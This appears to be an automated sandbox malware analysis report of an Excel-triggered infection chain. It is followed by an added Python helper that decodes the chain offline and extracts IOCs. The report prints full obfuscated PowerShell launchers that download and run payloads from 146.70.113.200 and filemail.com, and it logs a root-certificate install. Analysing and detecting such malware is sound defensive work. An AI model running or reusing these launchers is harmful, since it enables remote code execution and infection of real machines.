Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D51F8 push ds; ret 8_2_000007FE899D5242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D022D push eax; iretd 8_2_000007FE899D0241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D00BD pushad ; iretd 8_2_000007FE899D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D5813 push ebx; ret 8_2_000007FE899D583A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D580D push ecx; ret 8_2_000007FE899D5812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D583B push esp; ret 8_2_000007FE899D585A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE89AA096D pushad ; ret 8_2_000007FE89AA0991
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0041E922 push es; retf 27_2_0041E926
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004032D0 push eax; ret 27_2_004032D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00401BD8 pushad ; ret 27_2_00401BDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_004163F3 push edi; retf 27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416390 push cs; iretd 27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416393 push cs; iretd 27_2_004163C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00404C4C push ebx; retf 27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416453 push edi; retf 27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00404C65 push ebx; retf 27_2_00404CDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00416438 push edi; retf 27_2_004164AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00423594 pushfd ; retf 27_2_00423595
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00414616 push ebp; ret 27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00414623 push ebp; ret 27_2_00414631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00418E31 push FFFFFFF1h; ret 27_2_00418E3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0041E6A0 pushfd ; ret 27_2_0041E6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0041EF45 push edi; retf 27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0041EF53 push edi; retf 27_2_0041EF5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0040CFAF push esp; retf 27_2_0040CFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7DFA1 push ecx; ret 27_2_00A7DFB4
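The process-creation entries above record two obfuscated PowerShell launchers: the mshta.exe -> cmd.exe -> powershell.exe command that rebuilds `::` and `"` from `[char]` tokens around a base64 blob, and the later wscript.exe -> powershell.exe command that assigns a base64 blob to a variable and pipes it to Invoke-Expression. The following Python helper is an added analysis example, not part of the report or of the malware; it decodes both launchers offline, collapses the space padding, pulls out URLs (including the string-reversed one in the second stage) and %APPDATA% paths, and scores the randomised-case command name. Both command lines are copied verbatim from the report's own entries; nothing is fetched, the filemail.com assembly referenced by stage 2 is not on the page and is not reconstructed, and the heuristic threshold in `is_suspicious` is an assumption, not a Sigma rule.

```python
"""Decode the obfuscated PowerShell launcher chain recorded in this report's process tree.

Added analysis helper (not part of the original report or of the sample). The two command
lines below are copied verbatim from the report's process-creation entries; no network access.
"""
import base64
import re

# Stage 1: mshta.exe -> cmd.exe -> powershell.exe (copied from the report; trailing cmd quote dropped)
STAGE1_CMDLINE = r"""pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"""

# Stage 2: wscript.exe -> powershell.exe (copied from the report; powershell.exe path dropped)
STAGE2_CMDLINE = r"""$caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda"""

# Matches [cHaR]58, [ChAr]0X3A, ... (PowerShell [char] casts used to hide ':' and '"')
CHAR_TOKEN = re.compile(r"\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)


def fold_char_concat(expr: str) -> str:
    """Resolve [char]N tokens to literal characters and join the '+'-concatenated string pieces,
    so '[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8' becomes '[sYSTEM.tExt.ENCodIng]::utF8'."""
    def literal(m):
        v = m.group(1)
        return "'" + chr(int(v, 16) if v.lower().startswith("0x") else int(v)) + "'"
    return CHAR_TOKEN.sub(literal, expr).replace("'+'", "")


def extract_b64(script: str) -> str:
    """Return the argument of FromBase64String(): either an inline literal or the literal
    assigned to the $variable that is passed in (the stage-2 pattern)."""
    m = re.search(r"FromBase64String\(\s*\"?([A-Za-z0-9+/=]{16,})\"?\s*\)", script, re.I)
    if m:
        return m.group(1)
    m = re.search(r"FromBase64String\(\s*(\$\w+)\s*\)", script, re.I)
    if not m:
        raise ValueError("no FromBase64String() call found")
    assign = re.search(re.escape(m.group(1)) + r"\s*=\s*['\"]([A-Za-z0-9+/=]+)['\"]", script)
    if not assign:
        raise ValueError("base64 variable is not assigned a literal")
    return assign.group(1)


def decode_b64(blob: str) -> str:
    """Base64-decode as UTF-8, tolerating a blob emitted without '=' padding."""
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8")


def decode_launcher(cmdline: str) -> str:
    """Plaintext that Invoke-Expression would run for one launcher command line,
    with the 32-space padding runs inside the stage-1 blob collapsed."""
    return re.sub(r"[ \t]{2,}", " ", decode_b64(extract_b64(fold_char_concat(cmdline))))


def extract_iocs(script: str) -> dict:
    """URLs (normal and string-reversed, e.g. 'txt.../...//:ptth') and %APPDATA% drop paths."""
    urls = re.findall(r"https?://[^\s\"']+", script)
    urls += [u[::-1] for u in re.findall(r"'([^'\s]*//:s?ptth)'", script)]
    paths = re.findall(r"\$env:appdata\\[^\"'\s]+", script, re.I)
    return {"urls": list(dict.fromkeys(urls)), "paths": list(dict.fromkeys(paths))}


def case_flip_ratio(token: str) -> float:
    """Fraction of adjacent letter pairs whose case differs: ~0 for normal tokens,
    well above 0.5 for randomised-case tokens such as 'pOWeRsHElL'."""
    letters = [c for c in token if c.isalpha()]
    if len(letters) < 2:
        return 0.0
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return flips / (len(letters) - 1)


def is_suspicious(cmdline: str) -> bool:
    """Assumed triage heuristic (not a Sigma rule): case-mangled command name, [char] casts,
    or base64 decode feeding Invoke-Expression."""
    mangled = case_flip_ratio(cmdline.split()[0]) > 0.3
    lowered = cmdline.lower()
    return mangled or bool(CHAR_TOKEN.search(cmdline)) or (
        "frombase64string" in lowered and "invoke-expression" in lowered)


if __name__ == "__main__":
    for name, cmd in (("stage 1 (mshta -> cmd -> powershell)", STAGE1_CMDLINE),
                      ("stage 2 (wscript -> powershell)", STAGE2_CMDLINE)):
        script = decode_launcher(cmd)
        print(f"== {name}: suspicious={is_suspicious(cmd)}\n{script}\nIOCs: {extract_iocs(script)}\n")
```

Running it shows why the rest of the process tree looks the way it does: stage 1 is an `Add-Type -MemberDefinition` P/Invoke stub for `URLDownloadToFile` in urlmon.dll (which is what makes powershell.exe spawn csc.exe and cvtres.exe on the Temp\r3q12jmu and Temp\xmqw35tj .cmdline files), it downloads a `.tIF` from 146.70.113.200 to `%APPDATA%\...vbS`, sleeps three seconds and runs it with the `ii` (Invoke-Item) alias, which is the wscript.exe parent of the next stage. Stage 2 fetches text from filemail.com, cuts the part between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses it, `[System.Reflection.Assembly]::Load`s the result and calls a `VAI` method with the reversed URL `http://146.70.113.200/231/ZAHHRZA.txt` and the target name `aspnet_compiler`, matching the aspnet_compiler.exe process that later appears with unpacked code.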

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (12 identical entries)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (86 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (8 identical entries)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (73 identical entries)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (89 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (14 identical entries)
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
